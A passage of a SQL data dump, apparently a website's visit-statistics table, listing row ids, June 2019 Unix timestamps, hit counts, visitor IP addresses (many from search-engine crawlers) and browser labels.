,1,0,0,'157.55.39.74','other'),(426091,1559977588,36,36,0,0,'144.76.67.250','other'),(426092,1559977741,1,1,0,0,'207.46.13.199','other'),(426093,1559978278,1,1,0,0,'91.196.178.184','chrome'),(426094,1559978493,6,6,0,0,'144.76.67.250','other'),(426095,1559978507,1,1,0,0,'157.55.39.74','other'),(426096,1559978736,2,2,0,0,'207.46.13.199','other'),(426097,1559979294,1,1,0,0,'141.8.142.103','other'),(426098,1559979398,6,6,0,0,'144.76.67.250','other'),(426099,1559979619,1,1,0,0,'157.55.39.74','other'),(426100,1559980407,2,2,0,0,'157.55.39.201','other'),(426101,1559981171,3,3,0,0,'144.76.67.250','other'),(426102,1559981231,1,1,0,0,'207.46.13.130','other'),(426103,1559981564,1,1,0,0,'46.211.104.98','chrome'),(426104,1559982556,1,1,0,0,'207.46.13.130','other'),(426105,1559982666,1,1,0,0,'157.55.39.70','other'),(426106,1559982931,81,81,0,0,'144.76.67.250','other'),(426107,1559983297,1,1,0,0,'141.8.142.103','other'),(426108,1559983568,1,1,0,0,'66.249.69.62','chrome'),(426109,1559983783,1,1,0,0,'157.55.39.8','other'),(426110,1559983860,24,24,0,0,'144.76.67.250','other'),(426111,1559984762,44,44,0,0,'144.76.67.250','other'),(426112,1559984838,1,1,0,0,'66.249.69.58','chrome'),(426113,1559984988,1,1,0,0,'66.249.69.62','chrome'),(426114,1559985331,1,1,0,0,'66.249.69.60','chrome'),(426115,1559985594,2,2,0,0,'157.55.39.70','other'),(426116,1559985675,5,5,0,0,'144.76.67.250','other'),(426117,1559985678,1,1,0,0,'87.250.224.81','other'),(426118,1559985788,2,2,0,0,'8.29.198.27','other'),(426119,1559986588,4,4,0,0,'144.76.67.250','other'),(426120,1559986917,1,1,0,0,'207.46.13.204','other'),(426121,1559987500,1,1,0,0,'157.55.39.70','other'),(426122,1559987566,2,2,0,0,'66.249.75.124','chrome'),(426123,1559988018,1,1,0,0,'207.46.13.204','other'),(426124,1559988039,2,2,0,0,'66.249.69.60','chrome'),(426125,1559988354,18,18,0,0,'144.76.67.250','other'),(426126,1559988404,1,1,0,0,'40.77.167.125','other'),(426127,1559988447,1,1,0,0,'66.249.69.58','chrome'),(426128,1559988454,1,1,0,0,'109.74.154.72','chrome'),(426129,1559988594,1,1,0,0,'157.55.39.8','other'),(426130,1559988633,1,1,0,0,'66.249.69.62','chrome'),(426131,1559989024,1,1,0,0,'5.255.253.38','other'),(426132,1559989276,91,91,0,0,'144.76.67.250','other'),(426133,1559989770,1,1,0,0,'66.249.75.124','chrome'),(426134,1559989787,1,1,0,0,'66.249.69.58','chrome'),(426135,1559989978,1,1,0,0,'66.249.69.62','chrome'),(426136,1559990192,13,13,0,0,'144.76.67.250','other'),(426137,1559991099,82,82,0,0,'144.76.67.250','other'),(426138,1559991453,2,2,0,0,'66.249.75.122','chrome'),(426139,1559991581,1,1,0,0,'66.249.75.124','chrome'),(426140,1559991588,1,1,0,0,'141.8.183.23','other'),(426141,1559992008,12,12,0,0,'144.76.67.250','other'),(426142,1559992126,29,29,0,0,'157.55.39.110','other'),(426143,1559992155,31,31,0,0,'157.55.39.8','other'),(426144,1559992189,40,40,0,0,'207.46.13.204','other'),(426145,1559992234,31,31,0,0,'40.77.167.44','other'),(426146,1559992255,1,1,0,0,'66.249.75.126','chrome'),(426147,1559992593,1,1,0,0,'66.249.69.62','chrome'),(426148,1559993190,1,1,0,0,'66.249.69.58','chrome'),(426149,1559993219,1,1,0,0,'157.55.39.8','other'),(426150,1559993565,1,1,0,0,'66.249.75.124','chrome'),(426151,1559993597,1,1,0,0,'40.77.167.44','other'),(426152,1559993661,1,1,0,0,'157.55.39.110','other'),(426153,1559993788,2,2,0,0,'144.76.67.250','other'),(426154,1559993877,2,2,0,0,'66.249.69.60','chrome'),(426155,1559994290,1,1,0,0,'37.9.113.148','other'),(426156,1559994443,1,1,0,0,'180.235.129.104','chrome'),(426157,1559995026,1,1,0,0,'157.55.39.110','other'),(426158,1559995256,4,4,0,0,'66.249.69.60','chrome'),(426159,1559995443,1,1,0,0,'66.249.75.126','chrome'),(426160,1559995557,4,4,0,0,'144.76.67.250','other'),(426161,1559995755,1,1,0,0,'66.249.69.62','chrome'),(426162,1559995769,2,2,0,0,'180.240.134.109','chrome'),(426163,1559995782,1,1,0,0,'66.249.75.122','chrome'),(426164,1559996120,1,1,0,0,'66.249.75.124','chrome'),(426165,1559996251,1,1,0,0,'93.170.115.179','chrome'),(426166,1559996452,1,1,0,0,'87.250.224.47','other'),(426167,1559996602,1,1,0,0,'157.55.39.8','other'),(426168,1559996641,2,2,0,0,'8.29.198.25','other'),(426169,1559997155,3,3,0,0,'66.249.69.60','chrome'),(426170,1559997320,3,3,0,0,'144.76.67.250','other'),(426171,1559997458,1,1,0,0,'66.249.69.58','chrome'),(426172,1559997866,2,2,0,0,'89.111.178.203','chrome'),(426173,1559997897,1,1,0,0,'157.55.39.110','other'),(426174,1559998255,61,61,0,0,'144.76.67.250','other'),(426175,1559998447,1,1,0,0,'207.46.13.147','other'),(426176,1559998663,3,3,0,0,'66.249.69.60','chrome'),(426177,1559998723,2,2,0,0,'141.8.183.11','other'),(426178,1559998939,1,1,0,0,'66.249.69.62','chrome'),(426179,1559998954,1,1,0,0,'213.180.203.40','other'),(426180,1559998996,1,1,0,0,'173.236.13.50','chrome'),(426181,1559999024,1,1,0,0,'66.249.69.58','chrome'),(426182,1559999156,6,6,0,0,'144.76.67.250','other'),(426183,1559999302,1,1,0,0,'157.55.39.110','other'),(426184,1559999987,1,1,0,0,'207.46.13.26','other'),(426185,1559999999,1,1,0,0,'66.249.75.122','chrome'),(426186,1560000560,1,1,0,0,'103.224.80.3','chrome'),(426187,1560000604,2,2,0,0,'66.249.69.60','chrome'),(426188,1560000953,2,2,0,0,'144.76.67.250','other'),(426189,1560000986,1,1,0,0,'207.46.13.147','other'),(426190,1560002146,1,1,0,0,'66.249.75.122','chrome'),(426191,1560002326,1,1,0,0,'66.249.69.58','chrome'),(426192,1560002677,1,1,0,0,'62.212.65.84','chrome'),(426193,1560002723,3,3,0,0,'144.76.67.250','other'),(426194,1560002792,1,1,0,0,'66.249.75.124','chrome'),(426195,1560003586,1,1,0,0,'66.249.69.62','chrome'),(426196,1560003604,2,2,0,0,'157.55.39.55','other'),(426197,1560003646,2,2,0,0,'144.76.67.250','other'),(426198,1560003750,3,3,0,0,'207.46.13.147','other'),(426199,1560003756,1,1,0,0,'176.8.91.216','chrome'),(426200,1560003981,3,3,0,0,'40.77.167.37','other'),(426201,1560004144,3,3,0,0,'40.77.167.44','other'),(426202,1560004587,37,37,0,0,'144.76.67.250','other'),(426203,1560004713,1,1,0,0,'66.249.69.62','chrome'),(426204,1560005502,29,29,0,0,'144.76.67.250','other'),(426205,1560005902,1,1,0,0,'95.108.181.57','other'),(426206,1560005949,1,1,0,0,'141.8.142.103','other'),(426207,1560006098,1,1,0,0,'95.108.181.75','other'),(426208,1560006464,3,3,0,0,'144.76.67.250','other'),(426209,1560006492,1,1,0,0,'157.55.39.55','other'),(426210,1560007175,1,1,0,0,'185.77.1.168','chrome'),(426211,1560007221,1,1,0,0,'66.249.75.126','chrome'),(426212,1560007235,1,1,0,0,'192.249.123.153','chrome'),(426213,1560007273,1,1,0,0,'66.249.69.58','chrome'),(426214,1560007363,2,2,0,0,'66.249.69.62','chrome'),(426215,1560007488,1,1,0,0,'8.29.198.26','other'),(426216,1560007792,1,1,0,0,'176.9.9.94','other'),(426217,1560008151,1,1,0,0,'144.76.67.250','other'),(426218,1560008205,1,1,0,0,'66.249.75.122','chrome'),(426219,1560008248,1,1,0,0,'95.108.213.4','other'),(426220,1560008270,1,1,0,0,'8.29.198.27','other'),(426221,1560008443,1,1,0,0,'207.46.13.147','other'),(426222,1560008761,3,3,0,0,'91.98.103.46','chrome'),(426224,1560008795,2,2,0,0,'66.249.69.62','chrome'),(426225,1560009002,1,1,0,0,'66.249.69.60','chrome'),(426226,1560009023,2,2,0,0,'66.249.69.58','chrome'),(426227,1560009548,1,1,0,0,'54.36.149.11','other'),(426228,1560009698,1,1,0,0,'54.36.149.89','other'),(426229,1560009769,1,1,0,0,'157.55.39.55','other'),(426230,1560009966,1,1,0,0,'54.36.149.95','other'),(426231,1560010083,1,1,0,0,'54.36.149.15','other'),(426232,1560010112,1,1,0,0,'157.55.39.216','other'),(426233,1560010122,1,1,0,0,'207.46.13.147','other'),(426234,1560010568,1,1,0,0,'54.36.149.68','other'),(426235,1560010635,1,1,0,0,'141.8.183.23','other'),(426236,1560010820,3,3,0,0,'144.76.67.250','other'),(426237,1560010857,1,1,0,0,'213.180.203.48','other'),(426238,1560011256,1,1,0,0,'40.77.167.37','other'),(426239,1560011976,1,1,0,0,'66.249.69.60','chrome'),(426240,1560012200,1,1,0,0,'157.55.39.55','other'),(426241,1560012630,1,1,0,0,'144.76.67.250','other'),(426242,1560012970,1,1,0,0,'54.36.149.32','other'),(426243,1560013202,1,1,0,0,'40.77.167.37','other'),(426244,1560013493,1,1,0,0,'157.55.39.78','other'),(426245,1560013548,1,1,0,0,'144.76.67.250','other'),(426246,1560014304,1,1,0,0,'184.95.58.172','chrome'),(426247,1560014593,1,1,0,0,'54.36.149.1','other'),(426248,1560015377,2,2,0,0,'81.177.165.45','chrome'),(426249,1560015384,1,1,0,0,'157.55.39.186','other'),(426250,1560016416,1,1,0,0,'141.8.183.22','other'),(426251,1560016788,1,1,0,0,'213.180.203.61','other'),(426252,1560016881,1,1,0,0,'54.36.149.94','other'),(426253,1560017190,1,1,0,0,'37.60.252.236','chrome'),(426255,1560017531,7,7,0,0,'157.55.39.186','other'),(426256,1560017709,1,1,0,0,'54.36.149.22','other'),(426257,1560018200,1,1,0,0,'54.36.149.39','other'),(426258,1560018224,3,3,0,0,'157.55.39.113','other'),(426259,1560018350,1,1,0,0,'8.29.198.27','other'),(426260,1560018564,1,1,0,0,'94.46.163.106','chrome'),(426261,1560018734,1,1,0,0,'162.248.245.110','chrome'),(426262,1560018756,2,2,0,0,'40.77.167.212','other'),(426263,1560018863,1,1,0,0,'157.55.39.186','other'),(426264,1560019125,1,1,0,0,'8.29.198.25','other'),(426265,1560019180,1,1,0,0,'168.0.133.15','chrome'),(426266,1560019432,1,1,0,0,'207.46.13.110','other'),(426267,1560019465,1,1,0,0,'66.249.69.60','chrome'),(426268,1560019733,1,1,0,0,'66.249.75.122','chrome'),(426269,1560020127,2,2,0,0,'207.46.13.119','other'),(426270,1560020319,1,1,0,0,'64.90.34.104','chrome'),(426271,1560020894,2,2,0,0,'94.102.0.2','chrome'),(426272,1560020947,4,4,0,0,'66.249.69.60','chrome'),(426273,1560020948,1,1,0,0,'54.36.149.98','other'),(426274,1560021101,4,4,0,0,'66.249.69.58','chrome'),(426275,1560021409,1,1,0,0,'66.249.75.124','chrome'),(426276,1560021412,1,1,0,0,'66.249.69.62','chrome'),(426277,1560022159,1,1,0,0,'209.205.201.162','chrome'),(426278,1560022294,1,1,0,0,'178.20.225.137','chrome'),(426279,1560022312,1,1,0,0,'157.55.39.150','other'),(426280,1560023622,1,1,0,0,'51.15.72.153','chrome'),(426281,1560023706,1,1,0,0,'54.36.149.63','other'),(426282,1560024194,1,1,0,0,'207.46.13.110','other'),(426283,1560024438,1,1,0,0,'54.36.149.67','other'),(426284,1560024749,1,1,0,0,'54.36.149.56','other'),(426285,1560024859,1,1,0,0,'141.8.132.16','other'),(426286,1560025000,1,1,0,0,'66.249.69.60','chrome'),(426287,1560025160,1,1,0,0,'66.249.75.124','chrome'),(426288,1560025266,1,1,0,0,'54.36.149.66','other'),(426289,1560025270,2,2,0,0,'81.177.165.45','chrome'),(426290,1560025360,2,2,0,0,'94.247.27.80','chrome'),(426291,1560025700,2,2,0,0,'66.249.69.58','chrome'),(426292,1560025756,1,1,0,0,'91.196.178.164','chrome'),(426293,1560026072,2,2,0,0,'66.249.75.122','chrome'),(426294,1560026082,3,3,0,0,'66.249.69.62','chrome'),(426295,1560026326,1,1,0,0,'213.180.203.48','other'),(426296,1560026436,1,1,0,0,'157.55.39.97','other'),(426297,1560026691,1,1,0,0,'95.108.213.4','other'),(426298,1560027264,1,1,0,0,'54.36.149.29','other'),(426299,1560027415,1,1,0,0,'207.46.13.155','other'),(426300,1560027518,1,1,0,0,'91.209.11.236','other'),(426301,1560027568,2,2,0,0,'66.249.69.60','chrome'),(426302,1560027603,1,1,0,0,'91.196.178.73','chrome'),(426303,1560027623,1,1,0,0,'207.46.13.115','other'),(426304,1560027678,3,3,0,0,'66.249.69.58','chrome'),(426305,1560028415,2,2,0,0,'66.249.69.62','chrome'),(426306,1560028481,1,1,0,0,'157.55.39.158','other'),(426307,1560028849,2,2,0,0,'66.249.69.58','chrome'),(426308,1560028945,1,1,0,0,'207.46.13.155','other'),(426309,1560029042,1,1,0,0,'66.249.69.60','chrome'),(426310,1560029207,1,1,0,0,'8.29.198.26','other'),(426311,1560029832,1,1,0,0,'37.9.113.148','other'),(426312,1560029982,1,1,0,0,'8.29.198.27','other'),(426313,1560030010,1,1,0,0,'54.36.149.66','other'),(426314,1560030023,1,1,0,0,'178.154.244.11','other'),(426315,1560030055,1,1,0,0,'207.46.13.115','other'),(426316,1560030406,1,1,0,0,'66.249.69.62','chrome'),(426317,1560030475,1,1,0,0,'66.249.69.58','chrome'),(426318,1560031001,1,1,0,0,'54.36.149.105','other'),(426319,1560031418,1,1,0,0,'54.36.149.83','other'),(426320,1560031431,1,1,0,0,'66.249.69.58','chrome'),(426321,1560031502,2,2,0,0,'91.194.91.202','chrome'),(426322,1560031529,1,1,0,0,'199.16.157.181','other'),(426323,1560031634,3,3,0,0,'66.249.69.60','chrome'),(426324,1560031863,1,1,0,0,'40.77.167.167','other'),(426325,1560032026,1,1,0,0,'54.36.149.89','other'),(426326,1560032062,2,2,0,0,'66.249.69.62','chrome'),(426327,1560032488,1,1,0,0,'54.36.149.12','other'),(426328,1560032615,1,1,0,0,'54.36.149.38','other'),(426329,1560032679,1,1,0,0,'157.55.39.158','other'),(426330,1560032753,1,1,0,0,'66.249.69.60','chrome'),(426331,1560032999,1,1,0,0,'13.66.139.0','other'),(426332,1560033273,3,3,0,0,'66.249.69.58','chrome'),(426333,1560033287,1,1,0,0,'31.22.4.249','chrome'),(426334,1560033634,1,1,0,0,'94.102.0.2','chrome'),(426335,1560033642,1,1,0,0,'157.55.39.158','other'),(426336,1560033856,1,1,0,0,'54.36.149.92','other'),(426337,1560034476,2,2,0,0,'66.249.69.62','chrome'),(426338,1560034625,1,1,0,0,'66.249.69.58','chrome'),(426339,1560034700,2,2,0,0,'185.197.130.137','chrome'),(426340,1560035035,1,1,0,0,'66.249.69.60','chrome'),(426341,1560035396,2,2,0,0,'66.249.69.62','chrome'),(426342,1560035964,3,3,0,0,'66.249.69.60','chrome'),(426343,1560036643,1,1,0,0,'66.249.69.62','chrome'),(426344,1560036720,1,1,0,0,'66.249.69.58','chrome'),(426345,1560036990,1,1,0,0,'157.55.39.158','other'),(426346,1560037715,1,1,0,0,'95.108.213.4','other'),(426347,1560037785,1,1,0,0,'66.249.69.60','chrome'),(426348,1560038195,1,1,0,0,'157.55.39.53','other'),(426349,1560038200,1,1,0,0,'54.36.149.74','other'),(426350,1560038290,1,1,0,0,'66.249.75.124','chrome'),(426351,1560038689,1,1,0,0,'66.249.69.58','chrome'),(426352,1560038832,1,1,0,0,'66.249.69.62','chrome'),(426353,1560039700,1,1,0,0,'54.36.149.17','other'),(426354,1560039979,1,1,0,0,'54.36.149.104','other'),(426355,1560040059,1,1,0,0,'8.29.198.25','other'),(426356,1560040307,1,1,0,0,'54.36.149.53','other'),(426357,1560040465,1,1,0,0,'54.36.149.2','other'),(426358,1560040582,1,1,0,0,'66.249.75.124','chrome'),(426359,1560040796,2,2,0,0,'66.249.69.58','chrome'),(426360,1560040828,1,1,0,0,'8.29.198.26','other'),(426361,1560040968,1,1,0,0,'54.36.149.57','other'),(426362,1560041576,1,1,0,0,'207.46.13.58','other'),(426363,1560041590,1,1,0,0,'66.249.69.60','chrome'),(426364,1560042701,1,1,0,0,'66.249.69.60','chrome'),(426365,1560042911,1,1,0,0,'66.249.69.62','chrome'),(426366,1560043501,1,1,0,0,'157.55.39.156','other'),(426367,1560043533,2,2,0,0,'66.249.75.122','chrome'),(426368,1560043649,1,1,0,0,'66.249.69.58','chrome'),(426369,1560043951,1,1,0,0,'66.249.69.60','chrome'),(426370,1560044181,2,2,0,0,'78.138.107.125','other'),(426371,1560044683,1,1,0,0,'180.76.15.31','other'),(426372,1560044953,1,1,0,0,'40.77.167.90','other'),(426373,1560045416,1,1,0,0,'54.36.149.74','other'),(426374,1560045587,2,2,0,0,'40.77.167.89','other'),(426375,1560046350,1,1,0,0,'54.36.149.11','other'),(426376,1560046684,1,1,0,0,'180.76.15.140','other'),(426377,1560047255,1,1,0,0,'5.45.207.79','other'),(426378,1560047786,1,1,0,0,'66.249.69.58','chrome'),(426379,1560049662,2,2,0,0,'66.249.69.60','chrome'),(426380,1560049986,1,1,0,0,'91.209.11.236','other'),(426381,1560050894,1,1,0,0,'8.29.198.25','other'),(426382,1560051443,1,1,0,0,'66.249.75.126','chrome'),(426383,1560051552,1,1,0,0,'13.66.139.0','other'),(426384,1560051669,1,1,0,0,'5.45.207.19','other'),(426385,1560051689,1,1,0,0,'8.29.198.26','other'),(426386,1560051828,1,1,0,0,'178.154.244.11','other'),(426387,1560051971,1,1,0,0,'141.8.142.108','other'),(426388,1560052110,1,1,0,0,'66.249.75.124','chrome'),(426389,1560052141,1,1,0,0,'66.249.69.58','chrome'),(426390,1560052210,1,1,0,0,'207.46.13.193','other'),(426391,1560052348,1,1,0,0,'66.249.69.62','chrome'),(426392,1560052371,1,1,0,0,'66.249.69.60','chrome'),(426393,1560052978,1,1,0,0,'54.36.149.51','other'),(426394,1560053745,1,1,0,0,'207.46.13.185','other'),(426395,1560053986,1,1,0,0,'139.18.2.214','other'),(426396,1560053989,1,1,0,0,'66.249.69.62','chrome'),(426397,1560054063,1,1,0,0,'40.77.167.141','other'),(426398,1560054274,1,1,0,0,'66.249.75.122','chrome'),(426399,1560054327,2,2,0,0,'5.45.207.79','other'),(426400,1560054523,2,2,0,0,'66.249.75.124','chrome'),(426401,1560054899,1,1,0,0,'139.18.2.214','other'),(426402,1560054961,1,1,0,0,'54.36.149.87','other'),(426403,1560055077,1,1,0,0,'66.249.69.60','chrome'),(426404,1560055361,1,1,0,0,'91.209.11.236','other'),(426405,1560055369,1,1,0,0,'40.77.167.45','other'),(426406,1560055788,1,1,0,0,'5.45.207.19','other'),(426407,1560055806,1,1,0,0,'139.18.2.214','other'),(426408,1560055912,1,1,0,0,'54.36.149.88','other'),(426409,1560056100,1,1,0,0,'66.249.69.60','chrome'),(426410,1560056127,1,1,0,0,'207.189.30.222','msie'),(426411,1560056394,1,1,0,0,'207.46.13.185','other'),(426412,1560056437,1,1,0,0,'66.249.75.124','chrome'),(426413,1560056510,1,1,0,0,'169.57.142.75','chrome'),(426414,1560056651,1,1,0,0,'37.9.113.20','other'),(426415,1560056708,1,1,0,0,'139.18.2.214','other'),(426416,1560056762,1,1,0,0,'54.36.149.72','other'),(426417,1560056784,2,2,0,0,'40.77.167.45','other'),(426418,1560056849,1,1,0,0,'66.249.69.62','chrome'),(426419,1560056888,1,1,0,0,'54.36.149.16','other'),(426420,1560057054,1,1,0,0,'5.45.207.79','other'),(426421,1560057349,2,2,0,0,'66.249.69.60','chrome'),(426422,1560057612,1,1,0,0,'139.18.2.214','other'),(426423,1560058260,1,1,0,0,'54.36.149.39','other'),(426424,1560058489,1,1,0,0,'66.249.75.122','chrome'),(426425,1560058516,1,1,0,0,'139.18.2.214','other'),(426426,1560058586,1,1,0,0,'109.70.100.24','other'),(426427,1560058829,1,1,0,0,'66.249.69.58','chrome'),(426428,1560058904,1,1,0,0,'54.36.149.14','other'),(426429,1560058954,2,2,0,0,'207.46.13.193','other'),(426430,1560059109,2,2,0,0,'66.249.69.62','chrome'),(426431,1560059428,1,1,0,0,'139.18.2.214','other'),(426432,1560059652,4,4,0,0,'91.98.103.46','chrome'),(426433,1560059879,1,1,0,0,'54.36.149.69','other'),(426434,1560060338,1,1,0,0,'139.18.2.214','other'),(426435,1560060737,1,1,0,0,'169.57.142.75','chrome'),(426436,1560061293,1,1,0,0,'139.18.2.214','other'),(426437,1560061737,2,2,0,0,'8.29.198.27','other'),(426438,1560061877,1,1,0,0,'66.249.75.126','chrome'),(426439,1560062202,1,1,0,0,'139.18.2.214','other'),(426440,1560062610,2,2,0,0,'178.154.244.11','other'),(426441,1560062632,1,1,0,0,'66.249.69.58','chrome'),(426442,1560062842,1,1,0,0,'5.45.207.19','other'),(426443,1560063143,2,2,0,0,'208.113.153.221','chrome'),(426444,1560063178,1,1,0,0,'139.18.2.214','other'),(426445,1560063191,1,1,0,0,'37.73.180.204','chrome'),(426446,1560063417,1,1,0,0,'66.249.75.126','chrome'),(426447,1560063656,1,1,0,0,'91.209.11.236','other'),(426448,1560063846,2,2,0,0,'66.249.69.60','chrome'),(426449,1560064121,1,1,0,0,'139.18.2.214','other'),(426450,1560064389,2,2,0,0,'212.113.133.235','chrome'),(426451,1560065044,1,1,0,0,'139.18.2.214','other'),(426452,1560065401,2,2,0,0,'91.209.11.236','other'),(426453,1560065596,1,1,0,0,'54.36.149.90','other'),(426454,1560065649,1,1,0,0,'66.249.69.60','chrome'),(426455,1560065730,1,1,0,0,'66.249.75.122','chrome'),(426456,1560065836,1,1,0,0,'66.249.75.126','chrome'),(426457,1560065967,1,1,0,0,'139.18.2.214','other'),(426458,1560066197,1,1,0,0,'138.68.102.184','chrome'),(426459,1560066294,1,1,0,0,'178.133.164.159','chrome'),(426460,1560066402,1,1,0,0,'157.55.39.141','other'),(426461,1560066498,1,1,0,0,'207.46.13.185','other'),(426462,1560066634,1,1,0,0,'208.113.161.21','chrome'),(426463,1560066666,1,1,0,0,'108.179.246.62','chrome'),(426464,1560066724,1,1,0,0,'54.36.149.34','other'),(426465,1560066900,1,1,0,0,'139.18.2.214','other'),(426466,1560067461,1,1,0,0,'66.249.75.124','chrome'),(426467,1560067671,1,1,0,0,'37.60.232.98','chrome'),(426468,1560067687,2,2,0,0,'66.249.69.60','chrome'),(426469,1560067815,1,1,0,0,'139.18.2.214','other'),(426470,1560067908,2,2,0,0,'66.249.75.122','chrome'),(426471,1560067909,2,2,0,0,'66.249.69.58','chrome'),(426472,1560067953,1,1,0,0,'54.36.149.3','other'),(426473,1560068487,1,1,0,0,'151.80.39.16','other'),(426474,1560068724,1,1,0,0,'139.18.2.214','other'),(426475,1560068730,1,1,0,0,'66.249.75.124','chrome'),(426476,1560068800,1,1,0,0,'66.249.69.60','chrome'),(426477,1560068809,1,1,0,0,'66.249.75.122','chrome'),(426478,1560068883,2,2,0,0,'66.249.69.62','chrome'),(426479,1560069142,3,3,0,0,'69.163.152.110','chrome'),(426480,1560069237,1,1,0,0,'54.36.149.11','other'),(426481,1560069244,1,1,0,0,'157.55.39.141','other'),(426482,1560069380,1,1,0,0,'66.249.69.58','chrome'),(426483,1560069672,1,1,0,0,'139.18.2.214','other'),(426484,1560069717,1,1,0,0,'66.249.75.126','chrome'),(426485,1560069814,1,1,0,0,'66.33.196.105','chrome'),(426486,1560070431,2,2,0,0,'103.11.74.5','chrome'),(426487,1560070583,1,1,0,0,'139.18.2.214','other'),(426488,1560071092,1,1,0,0,'46.32.240.35','chrome'),(426489,1560071171,2,2,0,0,'66.249.69.60','chrome'),(426490,1560071214,1,1,0,0,'37.9.113.148','other'),(426491,1560071337,2,2,0,0,'66.249.69.62','chrome'),(426492,1560071465,1,1,0,0,'95.108.213.4','other'),(426493,1560071484,1,1,0,0,'66.249.69.58','chrome'),(426494,1560071501,1,1,0,0,'151.80.39.16','other'),(426495,1560071504,1,1,0,0,'139.18.2.214','other'),(426496,1560071556,1,1,0,0,'87.250.224.47','other'),(426497,1560071769,2,2,0,0,'207.46.13.252','other'),(426498,1560071860,1,1,0,0,'91.209.11.236','other'),(426499,1560072060,1,1,0,0,'157.55.39.141','other'),(426500,1560072419,1,1,0,0,'139.18.2.214','other'),(426501,1560072493,1,1,0,0,'157.55.39.163','other'),(426502,1560072573,1,1,0,0,'8.29.198.27','other'),(426503,1560072739,1,1,0,0,'66.249.69.60','chrome'),(426504,1560073059,1,1,0,0,'66.249.69.58','chrome'),(426505,1560073144,2,2,0,0,'5.45.207.79','other'),(426506,1560073327,1,1,0,0,'139.18.2.214','other'),(426507,1560073406,1,1,0,0,'188.253.3.172','chrome'),(426508,1560073407,2,2,0,0,'109.234.161.17','chrome'),(426509,1560073412,1,1,0,0,'8.29.198.26','other'),(426510,1560073420,1,1,0,0,'66.249.75.124','chrome'),(426511,1560073461,2,2,0,0,'45.120.149.219','chrome'),(426512,1560073715,2,2,0,0,'66.249.69.62','chrome'),(426513,1560073834,2,2,0,0,'109.234.165.72','chrome'),(426514,1560073879,1,1,0,0,'75.98.173.208','chrome'),(426515,1560074233,1,1,0,0,'139.18.2.214','other'),(426516,1560074481,1,1,0,0,'91.209.11.236','other'),(426517,1560074605,1,1,0,0,'109.74.154.72','chrome'),(426518,1560075149,1,1,0,0,'139.18.2.214','other'),(426519,1560075417,1,1,0,0,'66.249.69.60','chrome'),(426520,1560075501,1,1,0,0,'103.229.72.81','chrome'),(426521,1560075523,1,1,0,0,'5.45.207.19','other'),(426522,1560075528,1,1,0,0,'45.63.86.156','chrome'),(426523,1560075572,1,1,0,0,'66.249.69.58','chrome'),(426524,1560075603,1,1,0,0,'54.36.149.60','other'),(426525,1560075693,1,1,0,0,'157.55.39.141','other'),(426526,1560075832,1,1,0,0,'66.249.75.122','chrome'),(426527,1560075933,1,1,0,0,'207.46.13.252','other'),(426528,1560075961,1,1,0,0,'66.249.75.126','chrome'),(426529,1560076013,1,1,0,0,'123.126.113.86','other'),(426530,1560076081,1,1,0,0,'139.18.2.214','other'),(426531,1560076831,1,1,0,0,'207.46.13.185','other'),(426532,1560076871,1,1,0,0,'66.249.75.124','chrome'),(426533,1560076874,1,1,0,0,'157.55.39.112','other'),(426534,1560076887,1,1,0,0,'66.249.69.58','chrome'),(426535,1560077012,1,1,0,0,'139.18.2.214','other'),(426536,1560077100,4,4,0,0,'146.66.68.244','chrome'),(426537,1560077188,2,2,0,0,'206.198.226.20','chrome'),(426538,1560077679,1,1,0,0,'66.249.69.62','chrome'),(426539,1560077894,2,1,1,0,'66.249.69.58',''),(426540,1560077927,1,1,0,0,'139.18.2.214','other'),(426541,1560078069,1,1,0,0,'207.46.13.56','other'),(426542,1560078463,6,6,0,0,'66.249.69.58','chrome'),(426543,1560078524,4,4,0,0,'66.249.69.60','chrome'),(426544,1560078582,3,3,0,0,'66.249.75.122','chrome'),(426545,1560078589,1,1,0,0,'51.255.65.46','other'),(426546,1560078686,1,1,0,0,'66.249.69.62','chrome'),(426547,1560078814,3,3,0,0,'23.238.18.46','chrome'),(426548,1560078842,1,1,0,0,'139.18.2.214','other'),(426549,1560079537,1,1,0,0,'54.36.149.90','other'),(426550,1560079652,1,1,0,0,'141.8.183.22','other'),(426551,1560079687,1,1,0,0,'54.36.149.0','other'),(426552,1560079690,1,1,0,0,'66.249.69.60','chrome'),(426553,1560079708,4,4,0,0,'66.249.69.58','chrome'),(426554,1560079724,1,1,0,0,'66.249.75.122','chrome'),(426555,1560079758,1,1,0,0,'139.18.2.214','other'),(426556,1560080019,1,1,0,0,'54.36.149.37','other'),(426557,1560080541,2,2,0,0,'66.249.69.62','chrome'),(426558,1560080659,2,2,0,0,'66.249.69.58','chrome'),(426559,1560080665,1,1,0,0,'139.18.2.214','other'),(426560,1560080683,1,1,0,0,'54.36.149.18','other'),(426561,1560081073,1,1,0,0,'66.249.75.124','chrome'),(426562,1560081201,1,1,0,0,'66.249.75.122','chrome'),(426563,1560081546,1,1,0,0,'54.36.149.98','other'),(426564,1560081560,10,10,0,0,'66.249.69.58','chrome'),(426565,1560081573,1,1,0,0,'139.18.2.214','other'),(426566,1560082256,1,1,0,0,'54.36.149.22','other'),(426567,1560082381,2,2,0,0,'66.249.69.60','chrome'),(426568,1560082461,6,6,0,0,'66.249.69.58','chrome'),(426569,1560082491,1,1,0,0,'139.18.2.214','other'),(426570,1560082502,1,1,0,0,'66.249.69.62','chrome'),(426571,1560082774,1,1,0,0,'151.80.39.16','other'),(426572,1560082847,1,1,0,0,'54.36.149.54','other'),(426573,1560083368,2,2,0,0,'207.46.13.67','other'),(426574,1560083404,1,1,0,0,'139.18.2.214','other'),(426575,1560083422,1,1,0,0,'8.29.198.26','other'),(426576,1560083617,1,1,0,0,'54.36.149.94','other'),(426577,1560083634,1,1,0,0,'141.8.142.144','other'),(426578,1560083635,2,2,0,0,'91.209.11.236','other'),(426579,1560083850,2,2,0,0,'157.55.39.97','other'),(426580,1560084258,1,1,0,0,'8.29.198.25','other'),(426581,1560084334,1,1,0,0,'139.18.2.214','other'),(426582,1560084366,2,2,0,0,'66.249.69.60','chrome'),(426583,1560084457,234,234,0,0,'78.46.63.108','other'),(426584,1560084517,1,1,0,0,'66.249.69.58','chrome'),(426585,1560084546,195,195,0,0,'144.76.6.230','other'),(426586,1560084632,256,256,0,0,'5.9.61.232','other'),(426587,1560084716,1,1,0,0,'91.196.178.132','chrome'),(426588,1560084925,1,1,0,0,'54.36.149.39','other'),(426589,1560085256,1,1,0,0,'139.18.2.214','other'),(426590,1560085397,66,66,0,0,'78.46.63.108','other'),(426591,1560085449,29,29,0,0,'144.76.6.230','other'),(426592,1560085535,42,42,0,0,'5.9.61.232','other'),(426593,1560085661,2,2,0,0,'40.77.167.163','other'),(426594,1560086195,1,1,0,0,'139.18.2.214','other'),(